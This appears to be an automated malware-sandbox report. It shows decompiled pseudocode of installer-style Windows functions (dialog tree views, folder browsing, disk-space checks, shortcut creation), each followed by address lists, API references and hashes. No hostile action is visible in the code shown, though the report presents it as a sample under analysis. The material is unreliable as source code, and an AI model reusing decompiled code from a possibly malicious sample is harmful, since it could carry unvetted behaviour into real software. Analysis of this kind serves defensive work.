														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                0x004047f1
                                                0x004047f7
                                                0x004047f9
                                                0x004047ff
                                                0x00404805
                                                0x00404808
                                                0x00404812
                                                0x0040481b
                                                0x0040481e
                                                0x00404821
                                                0x00404a49
                                                0x00404a49
                                                0x00404a50
                                                0x00404a64
                                                0x00404a52
                                                0x00404a54
                                                0x00404a57
                                                0x00404a58
                                                0x00404a5f
                                                0x00404a5f
                                                0x00404a67
                                                0x00404a70
                                                0x00404a7b
                                                0x00404a7b
                                                0x00404a7e
                                                0x00404a81
                                                0x00404a90
                                                0x00404a90
                                                0x00404a97
                                                0x00404b0f
                                                0x00404b0f
                                                0x00404b12
                                                0x00404b14
                                                0x00404b17
                                                0x00404b1e
                                                0x00404b2c
                                                0x00404b2c
                                                0x00404b2e
                                                0x00404b31
                                                0x00404b38
                                                0x00404b3a
                                                0x00404b3e
                                                0x00404b5b
                                                0x00404b5f
                                                0x00404b5f
                                                0x00404b40
                                                0x00404b4d
                                                0x00404b4d
                                                0x00404b3e
                                                0x00404b38
                                                0x00000000
                                                0x00404b12
                                                0x00404a99
                                                0x00404a9c
                                                0x00404aa7
                                                0x00404aa9
                                                0x00404aac
                                                0x00404ab3
                                                0x00404ab8
                                                0x00404aba
                                                0x00404ac4
                                                0x00404ac4
                                                0x00404ac8
                                                0x00404aca
                                                0x00404acd
                                                0x00404acf
                                                0x00404ad2
                                                0x00404ae8
                                                0x00404ae8
                                                0x00404ad4
                                                0x00404ad4
                                                0x00404ada
                                                0x00404adc
                                                0x00404ae3
                                                0x00404ade
                                                0x00404ade
                                                0x00404ade
                                                0x00404adc
                                                0x00404aec
                                                0x00404aee
                                                0x00404af3
                                                0x00404afc
                                                0x00404afd
                                                0x00404b07
                                                0x00404b07
                                                0x00404b09
                                                0x00404b0c
                                                0x00404b0c
                                                0x00404acd
                                                0x00000000
                                                0x00404aba
                                                0x00404a9e
                                                0x00404aa1
                                                0x00404aa5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404aa5
                                                0x00404a83
                                                0x00404a8a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404a72
                                                0x00404a72
                                                0x00404a75
                                                0x00404b62
                                                0x00404b62
                                                0x00404b69
                                                0x00404bdd
                                                0x00404bdd
                                                0x00404be4
                                                0x00404bf0
                                                0x00404bf0
                                                0x00404bf2
                                                0x00404bf9
                                                0x00404bfb
                                                0x00404c00
                                                0x00404c02
                                                0x00404c05
                                                0x00404c05
                                                0x00404c0b
                                                0x00404c10
                                                0x00404c12
                                                0x00404c15
                                                0x00404c15
                                                0x00404c1b
                                                0x00404c21
                                                0x00404c27
                                                0x00404c27
                                                0x00404c2d
                                                0x00404c34
                                                0x00404d81
                                                0x00404d81
                                                0x00404d88
                                                0x00404d8a
                                                0x00404d91
                                                0x00404d95
                                                0x00404da2
                                                0x00404da2
                                                0x00404da5
                                                0x00404dab
                                                0x00404dbd
                                                0x00404dbd
                                                0x00404d91
                                                0x00000000
                                                0x00404c3a
                                                0x00404c3c
                                                0x00404c41
                                                0x00404c44
                                                0x00404c48
                                                0x00404c48
                                                0x00404c4d
                                                0x00404c50
                                                0x00404c91
                                                0x00404c93
                                                0x00404c9d
                                                0x00404ca3
                                                0x00404ca6
                                                0x00404cab
                                                0x00404cb2
                                                0x00404cb5
                                                0x00404d57
                                                0x00404d5d
                                                0x00404d63
                                                0x00404d68
                                                0x00404d6b
                                                0x00404d7c
                                                0x00404d7c
                                                0x00000000
                                                0x00404cbb
                                                0x00404cbb
                                                0x00404cbb
                                                0x00404cbe
                                                0x00404cc4
                                                0x00404cc7
                                                0x00404cc9
                                                0x00404ccb
                                                0x00404ccd
                                                0x00404cd0
                                                0x00404cd3
                                                0x00404cda
                                                0x00404cdc
                                                0x00404cdf
                                                0x00404ce6
                                                0x00404ce9
                                                0x00404ce9
                                                0x00404ce9
                                                0x00404ce9
                                                0x00404ced
                                                0x00404cf0
                                                0x00404cfc
                                                0x00404cfd
                                                0x00404d00
                                                0x00404d02
                                                0x00404d02
                                                0x00404d02
                                                0x00404cf2
                                                0x00404cf4
                                                0x00404cf4
                                                0x00404d21
                                                0x00404d21
                                                0x00404d22
                                                0x00404d2e
                                                0x00404d3d
                                                0x00404d3d
                                                0x00404d3f
                                                0x00404d42
                                                0x00404d4b
                                                0x00404d4b
                                                0x00000000
                                                0x00404cbe
                                                0x00404c52
                                                0x00404c5d
                                                0x00404c60
                                                0x00404c65
                                                0x00404c67
                                                0x00404c69
                                                0x00404c6b
                                                0x00404c7b
                                                0x00404c85
                                                0x00404c87
                                                0x00404c8a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404c6d
                                                0x00404c6d
                                                0x00404c6d
                                                0x00404c70
                                                0x00404c73
                                                0x00404c75
                                                0x00404c75
                                                0x00404c75
                                                0x00404c76
                                                0x00404c77
                                                0x00404c77
                                                0x00000000
                                                0x00404c6d
                                                0x00404c50
                                                0x00404c34
                                                0x00404b6b
                                                0x00404b71
                                                0x00000000
                                                0x00000000
                                                0x00404b7d
                                                0x00404b81
                                                0x00000000
                                                0x00000000
                                                0x00404b91
                                                0x00404b93
                                                0x00404b96
                                                0x00000000
                                                0x00000000
                                                0x00404ba8
                                                0x00404baa
                                                0x00404bad
                                                0x00404bb7
                                                0x00404bb9
                                                0x00404bba
                                                0x00404bbb
                                                0x00404bca
                                                0x00404bcc
                                                0x00404bd3
                                                0x00404bd6
                                                0x00000000
                                                0x00404bd6
                                                0x00404baf
                                                0x00404bb2
                                                0x00404bb5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404bb5
                                                0x00000000
                                                0x00404a75
                                                0x00404827
                                                0x0040482c
                                                0x00404831
                                                0x00404836
                                                0x00404837
                                                0x00404840
                                                0x0040484b
                                                0x00404856
                                                0x0040485c
                                                0x0040486a
                                                0x0040487f
                                                0x00404884
                                                0x0040488f
                                                0x00404898
                                                0x004048ad
                                                0x004048be
                                                0x004048cb
                                                0x004048cb
                                                0x004048d0
                                                0x004048d6
                                                0x004048d8
                                                0x004048db
                                                0x004048e0
                                                0x004048e5
                                                0x004048e7
                                                0x004048e7
                                                0x00404907
                                                0x00404907
                                                0x00404909
                                                0x0040490a
                                                0x0040490f
                                                0x00404912
                                                0x00404915
                                                0x00404919
                                                0x0040491e
                                                0x00404923
                                                0x00404927
                                                0x0040492c
                                                0x00404931
                                                0x00404933
                                                0x00404935
                                                0x0040493b
                                                0x00404a05
                                                0x00404a18
                                                0x00000000
                                                0x00404941
                                                0x00404944
                                                0x00404947
                                                0x0040494a
                                                0x0040494a
                                                0x00404950
                                                0x00404956
                                                0x00404959
                                                0x0040495f
                                                0x00404960
                                                0x00404965
                                                0x0040496e
                                                0x00404975
                                                0x00404978
                                                0x0040497b
                                                0x0040497e
                                                0x004049b8
                                                0x004049ba
                                                0x004049e3
                                                0x004049bc
                                                0x004049c9
                                                0x004049c9
                                                0x00404980
                                                0x00404983
                                                0x00404992
                                                0x0040499c
                                                0x004049a4
                                                0x004049ab
                                                0x004049b3
                                                0x004049b3
                                                0x0040497e
                                                0x004049e9
                                                0x004049ea
                                                0x004049f0
                                                0x004049f6
                                                0x004049f6
                                                0x00404a03
                                                0x00404a1e
                                                0x00404a22
                                                0x00404a3f
                                                0x00404a44
                                                0x00404a47
                                                0x00404a47
                                                0x00000000
                                                0x00404a24
                                                0x00404a29
                                                0x00404a32
                                                0x00404dbf
                                                0x00404dd1
                                                0x00404dd1
                                                0x00404a22
                                                0x00000000
                                                0x00404a03
                                                0x0040493b

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x608bff
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x601fd8
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                0x00404292
                                                0x00404298
                                                0x0040429e
                                                0x004042ab
                                                0x004042b9
                                                0x004042bc
                                                0x004042c4
                                                0x004042ca
                                                0x004042ca
                                                0x004042d6
                                                0x004042d9
                                                0x00404347
                                                0x0040434e
                                                0x00404425
                                                0x0040442c
                                                0x0040443b
                                                0x0040443b
                                                0x0040443f
                                                0x00404449
                                                0x00404456
                                                0x00404458
                                                0x00404458
                                                0x00404466
                                                0x0040446d
                                                0x00404474
                                                0x00404477
                                                0x004044ae
                                                0x004044b0
                                                0x004044b6
                                                0x004044bb
                                                0x004044bf
                                                0x004044c1
                                                0x004044c1
                                                0x004044dd
                                                0x00000000
                                                0x004044df
                                                0x004044e2
                                                0x004044f0
                                                0x004044f6
                                                0x004044f7
                                                0x004044fa
                                                0x004044fd
                                                0x00000000
                                                0x004044fd
                                                0x00404479
                                                0x0040447b
                                                0x0040447f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404481
                                                0x00404481
                                                0x0040448e
                                                0x00404493
                                                0x00000000
                                                0x00000000
                                                0x00404497
                                                0x00404499
                                                0x00404499
                                                0x004044a4
                                                0x004044a7
                                                0x004044ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004044ac
                                                0x00404509
                                                0x00404513
                                                0x00404516
                                                0x00404519
                                                0x00404520
                                                0x00404520
                                                0x00404522
                                                0x00404522
                                                0x00404527
                                                0x00404529
                                                0x00404531
                                                0x00404538
                                                0x0040453a
                                                0x00404545
                                                0x00404545
                                                0x0040453a
                                                0x0040454c
                                                0x00404555
                                                0x0040455f
                                                0x00404567
                                                0x00404582
                                                0x00404569
                                                0x00404572
                                                0x00404572
                                                0x00404567
                                                0x00404587
                                                0x0040458c
                                                0x00404591
                                                0x0040459a
                                                0x0040459a
                                                0x004045a3
                                                0x004045a5
                                                0x004045a5
                                                0x004045b1
                                                0x004045b9
                                                0x004045c3
                                                0x004045c3
                                                0x004045c8
                                                0x00000000
                                                0x004045c8
                                                0x00404477
                                                0x0040442e
                                                0x00404435
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404435
                                                0x00404354
                                                0x0040435d
                                                0x00404377
                                                0x0040437c
                                                0x00404386
                                                0x0040438d
                                                0x00404399
                                                0x0040439c
                                                0x0040439f
                                                0x004043a6
                                                0x004043ae
                                                0x004043b1
                                                0x004043b5
                                                0x004043bc
                                                0x004043c4
                                                0x0040441e
                                                0x004043c6
                                                0x004043c7
                                                0x004043ce
                                                0x004043d3
                                                0x004043d8
                                                0x004043e0
                                                0x004043ed
                                                0x00404401
                                                0x00404405
                                                0x00404405
                                                0x00404401
                                                0x0040440a
                                                0x00404417
                                                0x00404417
                                                0x004043c4
                                                0x00000000
                                                0x0040437c
                                                0x0040436a
                                                0x00000000
                                                0x00000000
                                                0x00404370
                                                0x00000000
                                                0x004042db
                                                0x004042e8
                                                0x004042f1
                                                0x004042fe
                                                0x004042fe
                                                0x00404305
                                                0x0040430b
                                                0x00404314
                                                0x00404317
                                                0x0040431a
                                                0x00404322
                                                0x00404325
                                                0x00404328
                                                0x0040432e
                                                0x00404335
                                                0x0040433c
                                                0x004045ce
                                                0x004045e0
                                                0x00404342
                                                0x00404345
                                                0x00000000
                                                0x00404345
                                                0x0040433c

                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                                • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                • lstrcmpiA.KERNEL32(pnzipglt,00420538,00000000,?,?), ref: 004043F9
                                                • lstrcatA.KERNEL32(?,pnzipglt), ref: 00404405
                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                                  • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                                  • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                                  • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                                • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                • MulDiv.KERNEL32 ref: 004044F0
                                                  • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                  • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                  • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$pnzipglt
                                                • API String ID: 2624150263-545010280
                                                • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
